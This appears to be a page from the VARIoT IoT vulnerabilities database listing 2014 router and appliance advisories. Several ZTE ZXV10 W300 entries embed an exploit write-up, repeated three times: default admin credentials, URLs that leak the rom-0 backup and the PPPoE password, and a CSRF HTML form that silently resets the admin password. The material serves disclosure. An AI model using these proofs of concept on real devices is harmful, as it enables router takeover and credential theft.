VARIoT IoT vulnerabilities database
| VAR-201406-0504 | No CVE | Enterasys DFE-Gold Series Unauthorized Access Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Enterasys is one of the famous network vendors. The Enterasys DFE-Gold Series has an unauthorized access vulnerability due to the device failing to access Telnet and SNMP from the address that restricts VRRP non-owners. Allow remote attackers to gain unauthorized access to the service.
| VAR-201406-0434 | CVE-2014-4645 |
D-link DSL-2760U-E1 Cross-Site Scripting Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201406-0044 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in dhcpinfo.html in D-link DSL-2760U-E1 allows remote attackers to inject arbitrary web script or HTML via a hostname. The D-Link DSL-2760U-E1 is a standard wireless network router. The D-Link DSL-2760U-E1 router 'dhcpinfo.html' has an HTML injection vulnerability due to failure to filter user-supplied input. An attacker could execute HTML and script code in the context of an affected site, steal a cookie-based authentication certificate or control how the site is presented to the user. D-link DSL-2760U-E1 is a router product of D-Link company
| VAR-201406-0493 | No CVE | Multiple vulnerabilities in ZyXEL P660RT2 EE |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
ZyXEL P660RT2 EE is an ADSL router product from ZyXEL.
There are security bypass and cross-site scripting vulnerabilities in ZyXEL P660RT2 EE. Attackers can use these vulnerabilities to bypass security restrictions, gain access to affected devices, or execute arbitrary HTML and script code in the context of the affected site to steal cookie-based authentication. Vulnerabilities in ZyXEL P660RT2 EE 3.40 (AXN.1) version, other versions may also be affected. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Note: This issue was previously titled 'ZyXEL P660RT2 EE Brute Force Authentication Bypass and Cross Site Scripting Vulnerabilities'. The title and short summary have been changed to better reflect the underlying component affected
| VAR-201406-0114 | CVE-2014-3431 | OS X Run on Symantec PGP Desktop and Encryption Desktop Professional Vulnerabilities in which restrictions on file operations can be bypassed |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Symantec PGP Desktop 10.x, and Encryption Desktop Professional 10.3.x before 10.3.2 MP2, on OS X uses world-writable permissions for temporary files, which allows local users to bypass intended restrictions on file reading, modification, creation, and permission changes via unspecified vectors. Symantec Encryption Desktop is prone to an insecure file-permissions vulnerability.
An attacker can exploit this issue to gain unauthorized access to or create arbitrary files with elevated privileges. PGP Desktop can create, distribute and store encryption keys. Encryption Desktop Professional encrypts stored data as well as entire hard drives or hard drive partitions. The vulnerability is caused by the program using world write permission for temporary files
| VAR-201406-0330 | CVE-2014-3053 | IBM Security Access Manager for Mobile and IBM Security Access Manager for Web Vulnerabilities that can bypass authentication in some firmware |
CVSS V2: 8.0 CVSS V3: - Severity: HIGH |
The Local Management Interface (LMI) in IBM Security Access Manager (ISAM) for Mobile 8.0 with firmware 8.0.0.0 through 8.0.0.3 and IBM Security Access Manager for Web 7.0, and 8.0 with firmware 8.0.0.2 and 8.0.0.3, allows remote attackers to bypass authentication via a login action with invalid credentials.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. ISAM for Web is a set of products used in user authentication, authorization, and Web single sign-on solutions. It provides user access management and Web application protection functions
| VAR-201406-0312 | CVE-2014-3296 | Cisco WebEx Meeting Server of XML programmatic interface Vulnerable to obtaining important meeting information |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The XML programmatic interface (XML PI) in Cisco WebEx Meeting Server 1.5(.1.131) and earlier allows remote authenticated users to obtain sensitive meeting information via a crafted URL, aka Bug ID CSCum03527. Cisco WebEx Meetings Server is prone to an information-disclosure vulnerability.
An attacker can leverage this issue to obtain sensitive information that may aid in further attacks.
This issue is being tracked by Cisco bug ID CSCum03527. Cisco WebEx Meeting Server is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution
| VAR-201406-0324 | CVE-2014-2962 | Belkin N150 path traversal vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Absolute path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. Belkin N150 wireless routers contain a path traversal vulnerability. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') http://cwe.mitre.org/data/definitions/22.htmlInformation may be obtained by a remote attacker. The Belkin N150 is a wireless router product. Belkin N150 is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Information obtained could aid in further attacks
| VAR-201406-0506 | No CVE | Philips 6000 Series 3D Ultra-Slim Smart LED TVMiracast Wi-Fi Feature Hardcoded Password Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Philips 6000 Series 3D Ultra-Slim Smart LED is an ultra-thin TV. The Philips 6000 Series 3D Ultra-Slim Smart LED TVMiracast Wi-Fi feature has a hard-coded password vulnerability that allows remote attackers to easily access smart TVs, such as TV access profiles and USB storage connected to files or take control of the TV.
| VAR-201406-0395 | CVE-2014-3778 |
ARRIS SBG901 SURFboard Wireless Cable Modem of goform/RgDdns Vulnerable to cross-site request forgery
Related entries in the VARIoT exploits database: VAR-E-201406-0088 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in goform/RgDdns in ARRIS (formerly Motorola) SBG901 SURFboard Wireless Cable Modem allow remote attackers to hijack the authentication of administrators for requests that (1) change the dns service via the DdnsService parameter, (2) change the username via the DdnsUserName parameter, (3) change the password via the DdnsPassword parameter, or (4) change the host name via the DdnsHostName parameter. The Motorola SBG901 modem is a router device. The Motorola SBG901 modem has a cross-site request forgery vulnerability that allows remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context.
An attacker can exploit this issue to perform certain unauthorized actions. This may lead to further attacks
| VAR-201406-0329 | CVE-2014-3052 | IBM Security Access Manager for Web Vulnerability in which important information is obtained in the firmware of |
CVSS V2: 3.3 CVSS V3: - Severity: LOW |
The reverse-proxy feature in IBM Security Access Manager (ISAM) for Web 8.0 with firmware 8.0.0.2 and 8.0.0.3 interprets the jct-nist-compliance parameter in the opposite of the intended manner, which makes it easier for remote attackers to obtain sensitive information by leveraging weak SSL encryption settings that lack NIST SP 800-131A compliance. IBM Security Access Manager is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions to gain sensitive information. This may lead to further attacks. IBM Security Access Manager (ISAM) for Web (formerly known as IBM Tivoli Access Manager for e-business) is a set of products used in user authentication, authorization and Web single sign-on solutions of IBM Corporation in the United States. It provides user access management and Web application protection function. There is a security vulnerability in the reverse-proxy component of ISAM for Web 8.0 using firmware versions 8.0.0.2 and 8.0.0.3. The vulnerability stems from the fact that the program does not correctly set the jct-nist-compliance configuration parameter
| VAR-202002-0775 | CVE-2014-4019 | ZTE ZXV10 W300 Information leakage vulnerability in router firmware |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK stores sensitive information under the web root with insufficient access control, which allows remote attackers to read backup files via a direct request for rom-0. ZTE ZXV10 W300 There is an information leakage vulnerability in the router firmware.Information may be obtained. The ZTE WXV10 W300 is a wireless router device. ZTE WXV10 W300 routers are prone to the following security vulnerabilities:
1. An insecure-default-password vulnerability.
2. Multiple information disclosure vulnerabilities.
3. A cross-site request-forgery vulnerability.
An attacker can leverage these issues to obtain sensitive information, gain unauthorized administrative access, perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in further attacks. # Exploit Title: ZTE WXV10 W300 Multiple Vulnerabilities
# Date: 17-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# Firmware: W300V1.0.0a_ZRD_LK
# ADSL Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86_64
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
#1| Default Password Being Used (CVE-2014-4018)
------------------------------------------------
In ZTE routers the username is a constant which is "admin" and the password by default is "admin"
#2| ROM-0 Backup File Disclosure (CVE-2014-4019)
-------------------------------------------------
The rom-0 backup file contains sensitive information such as the router password.
There is a disclosure in which anyone can download that file without any authentication by a simple GET request.
POC:
http://192.168.1.1/rom-0
You can find the router password using my rom-0 configuration decompressor.
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html
#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
---------------------------------------------------------------------
If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.
function doLoad() {
var value = document.forms[0].wanTypeRadio[2].checked;
doEnable();
QosCheck();
WANChkIdleTimeT();
if (value)
pppStaticCheck();
LockWhenPVC0();
LockPVC();
if(document.forms[0].wan_PPPPassword != null)
{
document.forms[0].wan_PPPPassword.value = pwdppp;
}
}
The "pwdpp" is loaded from an external file which you can see at the bottom of the page.
<script language="javascript" src="/basic/tc2wanfun.js"></script>
Once the user authenticates the router till another successful restart the password is written in that external JS file.
POC:
http://192.168.1.1/basic/tc2wanfun.js
#4| Admin Password Manipulation CSRF (CVE-2014-4155)
-----------------------------------------------------
You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.
POC:
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>
If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Ofcourse since there is no XSRF token in the request you change the password as you wish.
POC:
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
<input type="hidden" name="uiViewTools_Password" value="your_passwd" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
#5| Denial of Service
-----------------------
You can see my previous post about this vulnerability and the exploit.
https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737
| VAR-201407-0352 | CVE-2014-4018 | ZTE ZXV10 W300 Vulnerability to gain access rights in router firmware |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK has a default password of admin for the admin account, which makes it easier for remote attackers to obtain access via unspecified vectors. The ZTE WXV10 W300 is a wireless router device. The ZTE WXV10 W300 default password is vulnerable. ZTE WXV10 W300 routers are prone to the following security vulnerabilities:
1. An insecure-default-password vulnerability.
2. Multiple information disclosure vulnerabilities.
3. A cross-site request-forgery vulnerability. This may aid in further attacks. A remote attacker could exploit this vulnerability to gain access.
There is a disclosure in which anyone can download that file without any authentication by a simple GET request.
POC:
http://192.168.1.1/rom-0
You can find the router password using my rom-0 configuration decompressor.
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html
#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
---------------------------------------------------------------------
If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.
function doLoad() {
var value = document.forms[0].wanTypeRadio[2].checked;
doEnable();
QosCheck();
WANChkIdleTimeT();
if (value)
pppStaticCheck();
LockWhenPVC0();
LockPVC();
if(document.forms[0].wan_PPPPassword != null)
{
document.forms[0].wan_PPPPassword.value = pwdppp;
}
}
The "pwdpp" is loaded from an external file which you can see at the bottom of the page.
<script language="javascript" src="/basic/tc2wanfun.js"></script>
Once the user authenticates the router till another successful restart the password is written in that external JS file.
POC:
http://192.168.1.1/basic/tc2wanfun.js
#4| Admin Password Manipulation CSRF (CVE-2014-4155)
-----------------------------------------------------
You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.
POC:
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>
If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Ofcourse since there is no XSRF token in the request you change the password as you wish.
POC:
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
<input type="hidden" name="uiViewTools_Password" value="your_passwd" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
#5| Denial of Service
-----------------------
You can see my previous post about this vulnerability and the exploit.
https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737
| VAR-201407-0242 | CVE-2014-4154 | ZTE ZXV10 W300 In router firmware PPPoE/PPPoA Password acquisition vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the PPPoE/PPPoA password via a direct request for basic/tc2wanfun.js. ZTE ZXV10 W300 Router is a wireless router product of China ZTE Corporation (ZTE). ZTE WXV10 W300 routers are prone to the following security vulnerabilities:
1. An insecure-default-password vulnerability.
2. Multiple information disclosure vulnerabilities.
3. A cross-site request-forgery vulnerability.
An attacker can leverage these issues to obtain sensitive information, gain unauthorized administrative access, perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in further attacks. The vulnerability stems from the storage of sensitive information in the rom-0 backup file. # Exploit Title: ZTE WXV10 W300 Multiple Vulnerabilities
# Date: 17-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# Firmware: W300V1.0.0a_ZRD_LK
# ADSL Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86_64
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
#1| Default Password Being Used (CVE-2014-4018)
------------------------------------------------
In ZTE routers the username is a constant which is "admin" and the password by default is "admin"
#2| ROM-0 Backup File Disclosure (CVE-2014-4019)
-------------------------------------------------
The rom-0 backup file contains sensitive information such as the router password.
There is a disclosure in which anyone can download that file without any authentication by a simple GET request.
POC:
http://192.168.1.1/rom-0
You can find the router password using my rom-0 configuration decompressor.
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html
#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
---------------------------------------------------------------------
If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.
function doLoad() {
var value = document.forms[0].wanTypeRadio[2].checked;
doEnable();
QosCheck();
WANChkIdleTimeT();
if (value)
pppStaticCheck();
LockWhenPVC0();
LockPVC();
if(document.forms[0].wan_PPPPassword != null)
{
document.forms[0].wan_PPPPassword.value = pwdppp;
}
}
The "pwdpp" is loaded from an external file which you can see at the bottom of the page.
<script language="javascript" src="/basic/tc2wanfun.js"></script>
Once the user authenticates the router till another successful restart the password is written in that external JS file.
POC:
http://192.168.1.1/basic/tc2wanfun.js
#4| Admin Password Manipulation CSRF (CVE-2014-4155)
-----------------------------------------------------
You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.
POC:
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>
If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Ofcourse since there is no XSRF token in the request you change the password as you wish.
POC:
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
<input type="hidden" name="uiViewTools_Password" value="your_passwd" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
#5| Denial of Service
-----------------------
You can see my previous post about this vulnerability and the exploit.
https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737
| VAR-201406-0150 | CVE-2014-4155 | ZTE ZXV10 W300 Cross-site request forgery vulnerability in router firmware |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in the ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK allows remote attackers to hijack the authentication of administrators for requests that change the admin password via a request to Forms/tools_admin_1. The ZTE WXV10 W300 is a wireless router device. ZTE WXV10 W300 routers are prone to the following security vulnerabilities:
1. An insecure-default-password vulnerability.
2. Multiple information disclosure vulnerabilities.
3. A cross-site request-forgery vulnerability.
An attacker can leverage these issues to obtain sensitive information, gain unauthorized administrative access, perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in further attacks. # Exploit Title: ZTE WXV10 W300 Multiple Vulnerabilities
# Date: 17-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# Firmware: W300V1.0.0a_ZRD_LK
# ADSL Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86_64
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
#1| Default Password Being Used (CVE-2014-4018)
------------------------------------------------
In ZTE routers the username is a constant which is "admin" and the password by default is "admin"
#2| ROM-0 Backup File Disclosure (CVE-2014-4019)
-------------------------------------------------
The rom-0 backup file contains sensitive information such as the router password.
There is a disclosure in which anyone can download that file without any authentication by a simple GET request.
POC:
http://192.168.1.1/rom-0
You can find the router password using my rom-0 configuration decompressor.
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html
#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
---------------------------------------------------------------------
If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.
function doLoad() {
var value = document.forms[0].wanTypeRadio[2].checked;
doEnable();
QosCheck();
WANChkIdleTimeT();
if (value)
pppStaticCheck();
LockWhenPVC0();
LockPVC();
if(document.forms[0].wan_PPPPassword != null)
{
document.forms[0].wan_PPPPassword.value = pwdppp;
}
}
The "pwdpp" is loaded from an external file which you can see at the bottom of the page.
<script language="javascript" src="/basic/tc2wanfun.js"></script>
Once the user authenticates the router till another successful restart the password is written in that external JS file.
POC:
http://192.168.1.1/basic/tc2wanfun.js
#4| Admin Password Manipulation CSRF (CVE-2014-4155)
-----------------------------------------------------
You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.
POC:
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>
If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Ofcourse since there is no XSRF token in the request you change the password as you wish.
POC:
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
<input type="hidden" name="uiViewTools_Password" value="your_passwd" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
#5| Denial of Service
-----------------------
You can see my previous post about this vulnerability and the exploit.
https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737
| VAR-201406-0322 | CVE-2014-2949 | F5 ARX Data Manager contains a SQL injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in the web service in F5 ARX Data Manager 3.0.0 through 3.1.0 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') http://cwe.mitre.org/data/definitions/89.htmlDepending on the user who can log in to the product, any database on the database referenced by the product SQL The command may be executed. Authentication is not required to exploit this vulnerability. The specific flaw exists within the discoverFilerBasicInfo.jsft page. An attacker is able to inject SQL through the filerName field in this page, and use that to gain full administrator credentials for Data Manager.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. The solution supports data migration, storage tiering, and storage capacity balancing
| VAR-201406-0071 | CVE-2013-5017 | Symantec Web Gateway Management console SNMPConfig.php Vulnerable to arbitrary command execution |
CVSS V2: 7.9 CVSS V3: 9.8 Severity: CRITICAL |
SNMPConfig.php in the management console in Symantec Web Gateway (SWG) before 5.2.1 allows remote attackers to execute arbitrary commands via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. http://cwe.mitre.org/data/definitions/77.htmlAn arbitrary command may be executed by a third party. Authentication is required to exploit this vulnerability.The specific flaws exist within the user.php and snmpConfig.php files. SQL injection and command injection is possible through vulnerable request parameters. An attacker can leverage these vulnerabilities to read files and achieve remote code execution under the context of the root user.
Successful exploits will result in the execution of arbitrary commands with elevated privileges in the context of the affected appliance. The software provides web content filtering, data loss prevention, and more
| VAR-201406-0471 | No CVE | Onnto RAID Master Multiple Security Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Onnto RAID Master is a set of GUI software used by Onnto to manage the DataTale SMART Thunderbolt RAID system (disk array system).
Onnto RAID Master has access bypass vulnerability, command injection vulnerability and cross-site request forgery vulnerability. Attackers can use these vulnerabilities to perform administrator operations, execute arbitrary shell commands, and read or modify data. Onnto RAID Master is prone to the following security vulnerabilities:
1. An access-bypass vulnerability.
2. Multiple command injection vulnerabilities.
3. Other attacks are also possible
| VAR-201406-0505 | No CVE | Multiple Huawei product 'eSap' platform remote heap buffer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Huawei is a private technology company headquartered in Shenzhen, Guangdong Province, China, which manufactures and sells telecom equipment. It was founded in 1987 by Ren Zhengfei in Shenzhen, China. It is the world's largest provider of telecommunications network solutions and the second largest telecommunications network in the world. Base station equipment supplier. Multiple Huawei products have multiple heap buffer overflow vulnerabilities in their implementation due to failure to properly restrict access to heap memory. Attackers can exploit these vulnerabilities to cause a denial of service
| VAR-201406-0180 | CVE-2014-1650 | Symantec Web Gateway Management console user.php In SQL Injection vulnerability |
CVSS V2: 5.2 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in user.php in the management console in Symantec Web Gateway (SWG) before 5.2.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Symantec Web Gateway 5.2.1 are vulnerable. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more
| VAR-201406-0181 | CVE-2014-1651 | Symantec Web Gateway contains SQL injection and cross-site scripting vulnerabilities |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in clientreport.php in the management console in Symantec Web Gateway (SWG) before 5.2 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more